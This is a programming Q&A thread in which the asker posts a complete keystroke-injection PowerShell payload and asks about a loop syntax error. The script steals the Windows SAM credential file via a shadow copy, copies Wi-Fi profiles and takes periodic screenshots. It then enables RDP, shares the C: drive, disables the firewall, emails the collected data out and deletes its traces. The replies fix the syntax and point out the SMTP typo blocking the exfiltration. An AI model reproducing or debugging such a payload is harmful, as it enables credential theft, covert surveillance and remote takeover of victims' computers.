# Powershell "You must provide a value expression following the '-ne' operator" error

Tags: powershell

I'm having a problem with some code in powershell, I keep getting this error:

```
At line:1 char:7
+ $x++  } while ($x -ne );
+       ~
Unexpected token '}' in expression or statement.
At line:1 char:22
+ $x++  } while ($x -ne );
+                      ~
You must provide a value expression following the '-ne' operator.
At line:1 char:24
+ $x++  } while ($x -ne );
+                        ~
Missing statement body in while loop.
+ CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : UnexpectedToken
```

Does anybody know how to fix it?
The target system is windows 10.
I think the problem lies in this part "$x++  } while ($x -ne );" but I'm not sure.
Here's the code (sorry that i pasted so much code, but I wasn't sure if some of the other things were a part of the error):

```
Windowsbutton+r
powershell Start-Process notepad -Verb runAs
Enter

$folderDateTime = (get-date).ToString('d-M-y HHmmss')
$userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime
$fileSaveDir = New-Item  ($userDir) -ItemType Directory 
$date = get-date 
$style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>"
$Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html' 
$Report = $Report + "<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>" 
$wlanSaveDir = New-Item $userDir'\Duck\WLAN_PROFILES' -ItemType Directory
$srcDir = 'C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces'
Copy-Item $srcDir $wlanSaveDir -Recurse  
$SysBootTime = Get-WmiObject Win32_OperatingSystem  
$BootTime = $SysBootTime.ConvertToDateTime($SysBootTime.LastBootUpTime)| ConvertTo-Html datetime  
$SysSerialNo = (Get-WmiObject -Class Win32_OperatingSystem -ComputerName $env:COMPUTERNAME)  
$SerialNo = $SysSerialNo.SerialNumber  
$SysInfo = Get-WmiObject -class Win32_ComputerSystem -namespace root/CIMV2 | Select Manufacturer,Model  
$SysManufacturer = $SysInfo.Manufacturer  
$SysModel = $SysInfo.Model
$OS = (Get-WmiObject Win32_OperatingSystem -computername $env:COMPUTERNAME ).caption 
$disk = Get-WmiObject Win32_LogicalDisk -Filter "DeviceID='C:'"
$HD = [math]::truncate($disk.Size / 1GB) 
$FreeSpace = [math]::truncate($disk.FreeSpace / 1GB) 
$SysRam = Get-WmiObject -Class Win32_OperatingSystem -computername
$env:COMPUTERNAME | Select  TotalVisibleMemorySize 
$Ram = [Math]::Round($SysRam.TotalVisibleMemorySize/1024KB) 
$SysCpu = Get-WmiObject Win32_Processor | Select Name 
$Cpu = $SysCpu.Name 
$HardSerial = Get-WMIObject Win32_BIOS -Computer $env:COMPUTERNAME | select SerialNumber 
$HardSerialNo = $HardSerial.SerialNumber 
$SysCdDrive = Get-WmiObject Win32_CDROMDrive |select Name 
$graphicsCard = gwmi win32_VideoController |select Name 
$graphics = $graphicsCard.Name 
$SysCdDrive = Get-WmiObject Win32_CDROMDrive |select -first 1 
$DriveLetter = $CDDrive.Drive 
$DriveName = $CDDrive.Caption 
$Disk = $DriveLetter + '\' + $DriveName 
$Firewall = New-Object -com HNetCfg.FwMgr  
$FireProfile = $Firewall.LocalPolicy.CurrentProfile  
$FireProfile = $FireProfile.FirewallEnabled
$Report = $Report  + "<div id=left><h3>Computer Information</h3><br><table><tr><td>Operating System</td><td>$OS</td></tr><tr><td>OS Serial Number:</td><td>$SerialNo</td></tr><tr><td>Current User:</td><td>$env:USERNAME </td></tr><tr><td>System Uptime:</td><td>$BootTime</td></tr><tr><td>System Manufacturer:</td><td>$SysManufacturer</td></tr><tr><td>System Model:</td><td>$SysModel</td></tr><tr><td>Serial Number:</td><td>$HardSerialNo</td></tr><tr><td>Firewall is Active:</td><td>$FireProfile</td></tr></table></div><div id=right><h3>Hardware Information</h3><table><tr><td>Hardrive Size:</td><td>$HD GB</td></tr><tr><td>Hardrive Free Space:</td><td>$FreeSpace GB</td></tr><tr><td>System RAM:</td><td>$Ram GB</td></tr><tr><td>Processor:</td><td>$Cpu</td></tr><td>CD Drive:</td><td>$Disk</td></tr><tr><td>Graphics Card:</td><td>$graphics</td></tr></table></div>"  
$UserInfo = Get-WmiObject -class Win32_UserAccount -namespace root/CIMV2 | Where-Object {$_.Name -eq $env:UserName}| Select AccountType,SID,PasswordRequired  
$UserType = $UserInfo.AccountType 
$UserSid = $UserInfo.SID
$UserPass = $UserInfo.PasswordRequired 
$IsAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator') 
$Report =  $Report + "<div id=left><h3>User Information</h3><br><table><tr><td>Current User Name:</td><td>$env:USERNAME</td></tr><tr><td>Account Type:</td><td> $UserType</td></tr><tr><td>User SID:</td><td>$UserSid</td></tr><tr><td>Account Domain:</td><td>$env:USERDOMAIN</td></tr><tr><td>Password Required:</td><td>$UserPass</td></tr><tr><td>Current User is Admin:</td><td>$IsAdmin</td></tr></table>" 
$Report = $Report + '</div>' 
$createShadow = (gwmi -List Win32_ShadowCopy).Create('C:\', 'ClientAccessible')
$shadow = gwmi Win32_ShadowCopy | ? { $_.ID -eq $createShadow.ShadowID } 
$addSlash  = $shadow.DeviceObject + '\' 
cmd /c mklink C:\shadowcopy $addSlash
Copy-Item 'C:\shadowcopy\Windows\System32\config\SAM' $fileSaveDir
Remove-Item -recurse -force 'C:\shadowcopy'
$Report =  $Report + '<div id=center><h3> Installed Updates</h3>'  
$Report =  $Report +  (Get-WmiObject Win32_QuickFixEngineering -ComputerName $env:COMPUTERNAME | sort-object -property installedon -Descending | ConvertTo-Html   Description, HotFixId,Installedon,InstalledBy) 
$Report = $Report + '</div>' 
$Report =  $Report + '<div id=center><h3> Installed Programs</h3> ' 
$Report =  $Report + (Get-WmiObject -class Win32_Product | ConvertTo-html  Name, Version,InstallDate) 
$Report = $Report + '</table></div>' 
$u = 0 
$allUsb = @(get-wmiobject win32_volume | select Name, Label, FreeSpace) 
$Report =  $Report + '<div id=right><h3>USB Devices</h3><table>' 
do { 
$gbUSB = [math]::truncate($allUsb[$u].FreeSpace / 1GB) 
$Report = $Report + "<tr><td>Drive Name: </td><td> " + $allUsb[$u].Name + $allUsb[$u].Label + "</td><td>Free Space: </td><td>" + $gbUSB + "GB</td></tr>"
Write-Output $fullUSB
$u ++ 
} while ($u -lt $allUsb.Count) 
$Report = $Report + '</table></div>' 
$jpegSaveDir = New-Item $fileSaveDir'\Screenshots' -ItemType Directory
$x = 0
do { Start-Sleep -Seconds 60
$jpegName = (get-date).ToString('HHmmss')
$File = "$jpegSaveDir\$jpegName.bmp"
Add-Type -AssemblyName System.Windows.Forms
Add-type -AssemblyName System.Drawing
$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
$Width = $Screen.Width
$Height = $Screen.Height
$Left = $Screen.Left
$Top = $Screen.Top
$bitmap = New-Object System.Drawing.Bitmap $Width, $Height
$graphic = [System.Drawing.Graphics]::FromImage($bitmap)
$graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size)
$bitmap.Save($File)
$x++  } while ($x -ne );
$Report =  $Report + '<div id=center><h3>Network Information</h3>' 
$Report =  $Report + (Get-WmiObject Win32_NetworkAdapterConfiguration -filter 'IPEnabled= True' | Select Description,DNSHostname, @{Name='IP Address ';Expression={$_.IPAddress}}, MACAddress | ConvertTo-Html) 
$Report = $Report + '</table></div>' 
$Report =  $Report + '<div id=center><h3>User Documents (doc,docx,pdf,rar)</h3>' 
$Report =  $Report + (Get-ChildItem -Path $userDir -Include *.doc, *.docx, *.pdf, *.zip, *.rar -Recurse |convertto-html Directory, Name, LastAccessTime) 
$Report = $Report + '</div>' 
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name fDenyTSConnections -Value 0
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name UserAuthentication -Value 1
netsh advfirewall firewall set rule group='remote desktop - remotefx' new enable=Yes 
netsh advfirewall firewall set rule group='remote desktop' new enable=Yes 
$Share = [WmiClass]'Win32_Share'
$Share.Create('C:\', 'netShare', 0)
netsh advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes 
netsh advfirewall set allprofiles state off  
$Report >> $fileSaveDir'/ComputerInfo.html' 
function copy-ToZip($fileSaveDir){ 
$srcdir = $fileSaveDir 
$zipFile = 'C:\Windows\Report.zip'
if(-not (test-path($zipFile))) { 
set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18)) 
(dir $zipFile).IsReadOnly = $false} 
$shellApplication = new-object -com shell.application 
$zipPackage = $shellApplication.NameSpace($zipFile) 
$files = Get-ChildItem -Path $srcdir 
foreach($file in $files) { 
$zipPackage.CopyHere($file.FullName) 
while($zipPackage.Items().Item($file.name) -eq $null){ 
Start-sleep -seconds 1 }}} 
copy-ToZip($fileSaveDir) 
try {
$Sender = 'sender@gmail.com'
$Recipient = 'Recipient@email.com'
$pass = ConvertTo-SecureString 'Password' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential($sender.Split("@")[0], $pass)
Send-MailMessage -From $Sender -To $Recipient -Subject "DuckToolkit Report" -Body "Please find attached the DuckToolkit reconnaissance report." -SmtpServer "smtp.gamil.com" -UseSSL -credential $creds -Attachments "C:\Windows\Report.zip"}
catch {
break }
remove-item $fileSaveDir -recurse 
remove-item 'C:\Windows\Report.zip'
Remove-Item $MyINvocation.InvocationName `

Ctrl+s
C:\Windows\config-85023.ps1
Enter
Windowsbutton+r
powershell Start-Process cmd -Verb runAs
Enter
powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
Enter
powershell.exe -windowstyle hidden -File C:\Windows\config-85023.ps1
Enter
```

Answer (score 0):

while ($x -ne );

you have to match $X with something, you aren't doing that right now.
If you want to compare it with nothing, try ""

Comment: Actually, it would be better to compare it with `$null`; there are some conditions where `""` is _not_ equivalent to `$null` - passed parameters come to mind; comparing an omitted parameter to "" does not give the same result as comparing it to `$null`.

Comment: Thanks i didn't know that

Answer (score 0):

As the other answer, you have to match -ne. As you are trying to match to $null, a more powershell way of writing it would be to :

while (!$x);

Comment: Thanks, both of your posts have helped me, but now my problem is that when i run it, it finishes but then nothing happens, I don't get any mail.
I'll just change the code up there to include it all and not just the powershell part, so you can see it.

Comment: There's a typo at line 124: `"smtp.gamil.com"`. That could be causing the failure

Comment: Ahhh, thanks mate, that's probably a part of the problem, how did I not realise that xD